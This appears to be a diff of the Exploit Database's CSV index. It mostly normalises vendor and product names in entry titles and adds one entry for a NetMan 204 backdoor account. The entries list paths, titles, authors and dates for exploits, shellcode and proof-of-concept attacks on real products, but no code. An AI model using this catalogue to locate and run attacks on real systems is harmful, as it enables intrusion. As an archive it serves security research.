29810,platforms/windows/dos/29810.c,"Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service",2007-04-01,"David Matousek",windows,dos,0 29813,platforms/windows/dos/29813.py,"Microsoft Windows Vista - ARP Table Entries Denial of Service",2004-04-02,"Kristian Hermansen",windows,dos,0 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - LPEXT.dll Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0 -29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 +29815,platforms/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 @@ -27683,7 +27686,7 @@ id,file,description,date,author,platform,type,port 31530,platforms/php/webapps/31530.txt,"Joomla! / Mambo Component Download3000 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 'haberoku.php' SQL Injection",2008-03-25,cOndemned,php,webapps,0 30672,platforms/windows/dos/30672.txt,"Live for Speed - Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos,0 -30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 +30673,platforms/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0 30674,platforms/java/webapps/30674.txt,"Stringbeans Portal 3.2 Projects Script - Cross-Site Scripting",2007-10-15,JosS,java,webapps,0 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 @@ -28551,7 +28554,7 @@ id,file,description,date,author,platform,type,port 31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,php,webapps,0 31615,platforms/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos,0 31616,platforms/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0 -31617,platforms/hardware/webapps/31617.txt,"NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 +31617,platforms/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",hardware,webapps,0 31618,platforms/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,ios,webapps,0 31619,platforms/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Parameter Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos,0 31620,platforms/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service",2008-04-21,"Core Security Technologies",osx,dos,0 @@ -28742,8 +28745,8 @@ id,file,description,date,author,platform,type,port 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps,0 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0 -31818,platforms/windows/dos/31818.sh,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0 -31819,platforms/windows/dos/31819.pl,"vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 +31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0 +31819,platforms/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos,0 31820,platforms/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",unix,remote,0 31821,platforms/php/webapps/31821.txt,"PHPFreeForum 1.0 rc2 - error.php message Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0 @@ -29157,7 +29160,7 @@ id,file,description,date,author,platform,type,port 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 -32256,platforms/windows/dos/32256.py,"Ipswitch 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 +32256,platforms/windows/dos/32256.py,"Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29432,7 +29435,7 @@ id,file,description,date,author,platform,type,port 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router - Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 -32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 +32583,platforms/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server - 'Username' Enumeration",2008-11-14,"Bernardo Damele",windows,remote,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 @@ -29616,7 +29619,7 @@ id,file,description,date,author,platform,type,port 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 -32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0 +32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0 32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps,0 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0 32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0 @@ -29721,7 +29724,7 @@ id,file,description,date,author,platform,type,port 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 - Malformed HTML File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0 -32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 +32883,platforms/hardware/webapps/32883.txt,"Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",unix,remote,443 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 @@ -29971,7 +29974,7 @@ id,file,description,date,author,platform,type,port 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,hardware,webapps,0 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 -33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 +33138,platforms/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",hardware,webapps,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service",2010-01-31,"Evgeny Legerov",multiple,dos,0 33142,platforms/multiple/remote/33142.rb,"Apache Struts - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-05-02,Metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)",2014-05-02,"Brandon Perry",hardware,remote,443 @@ -30847,7 +30850,7 @@ id,file,description,date,author,platform,type,port 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80 34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0 -34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 +34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0 34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0 34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0 34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0 @@ -31227,8 +31230,8 @@ id,file,description,date,author,platform,type,port 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34583,platforms/hardware/webapps/34583.txt,"TP-Link Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 -34584,platforms/hardware/webapps/34584.txt,"TP-Link Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 +34583,platforms/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 +34584,platforms/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090 @@ -31791,7 +31794,7 @@ id,file,description,date,author,platform,type,port 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps,0 35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 - Multiple SQL Injections",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0 35187,platforms/php/webapps/35187.txt,"Joostina 1.3 - 'index.php' Cross-Site Scripting",2011-01-08,MustLive,php,webapps,0 -35188,platforms/windows/remote/35188.py,"SolarFTP 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 +35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar - 'tovar.php' SQL Injection",2011-01-11,jos_ali_joe,php,webapps,0 @@ -31908,7 +31911,7 @@ id,file,description,date,author,platform,type,port 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 -35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 +35325,platforms/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35380,platforms/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution (Metasploit)",2014-11-26,Metasploit,php,remote,80 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 @@ -31933,6 +31936,7 @@ id,file,description,date,author,platform,type,port 35346,platforms/php/webapps/35346.txt,"Wordpress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 +40431,platforms/hardware/remote/40431.txt,"NetMan 204 - Backdoor Account",2016-09-27,"Saeed reza Zamanian",hardware,remote,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 @@ -32358,7 +32362,7 @@ id,file,description,date,author,platform,type,port 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0 -35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 +35817,platforms/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 @@ -32899,7 +32903,7 @@ id,file,description,date,author,platform,type,port 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla! Component Simple Photo Gallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 -36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 +36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0 36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php' task Parameter Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 @@ -33699,7 +33703,7 @@ id,file,description,date,author,platform,type,port 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0 37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 -37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 +37238,platforms/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC (2)",2015-06-08,"Pawel Wylecial",windows,dos,0 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 @@ -34135,10 +34139,10 @@ id,file,description,date,author,platform,type,port 37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - '.srt' Crash (PoC)",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash (PoC)",2015-07-31,"SATHISH ARTHAR",windows,dos,0 37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash (PoC)",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0 -37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 -37721,platforms/multiple/dos/37721.c,"ISC BIND9 - TKEY (PoC)",2015-08-01,"Errata Security",multiple,dos,0 +37720,platforms/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 +37721,platforms/multiple/dos/37721.c,"ISC BIND 9 - TKEY (PoC)",2015-08-01,"Errata Security",multiple,dos,0 37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0 -37723,platforms/multiple/dos/37723.py,"ISC BIND9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,multiple,dos,0 +37723,platforms/multiple/dos/37723.py,"ISC BIND 9 - TKEY Remote Denial of Service (PoC)",2015-08-05,elceef,multiple,dos,0 37724,platforms/linux/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",linux,local,0 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 @@ -34491,7 +34495,7 @@ id,file,description,date,author,platform,type,port 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,linux,remote,10443 -38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 +38097,platforms/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 38105,platforms/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 38108,platforms/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0 @@ -34509,7 +34513,7 @@ id,file,description,date,author,platform,type,port 38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38124,platforms/android/remote/38124.py,"Android (Stagefright) - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 +38124,platforms/android/remote/38124.py,"Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38125,platforms/php/dos/38125.txt,"PHP - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile Bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 @@ -34576,7 +34580,7 @@ id,file,description,date,author,platform,type,port 38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80 38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - Cross-Site Request Forgery",2015-09-15,hyp3rlinx,jsp,webapps,80 38194,platforms/android/shellcode/38194.c,"Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 -38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL (MS15-100)",2015-09-15,Metasploit,windows,remote,0 +38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL Exploit (MS15-100)",2015-09-15,Metasploit,windows,remote,0 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80 38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 @@ -34605,7 +34609,7 @@ id,file,description,date,author,platform,type,port 38223,platforms/php/webapps/38223.txt,"ZeusCart 4.0 - Cross-Site Request Forgery",2015-09-17,"Curesec Research Team",php,webapps,80 38224,platforms/php/webapps/38224.txt,"ZeusCart 4.0 - SQL Injection",2015-09-17,"Curesec Research Team",php,webapps,80 38225,platforms/windows/dos/38225.txt,"VBox Satellite Express 2.3.17.3 - Arbitrary Write",2015-09-17,KoreLogic,windows,dos,0 -38226,platforms/android/remote/38226.py,"Android libstagefright - Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0 +38226,platforms/android/remote/38226.py,"Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote,0 38227,platforms/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote,0 38228,platforms/php/webapps/38228.txt,"phpLiteAdmin - 'table' Parameter SQL Injection",2013-01-15,KedAns-Dz,php,webapps,0 38229,platforms/php/webapps/38229.txt,"IP.Gallery - 'img' Parameter SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 @@ -35429,7 +35433,7 @@ 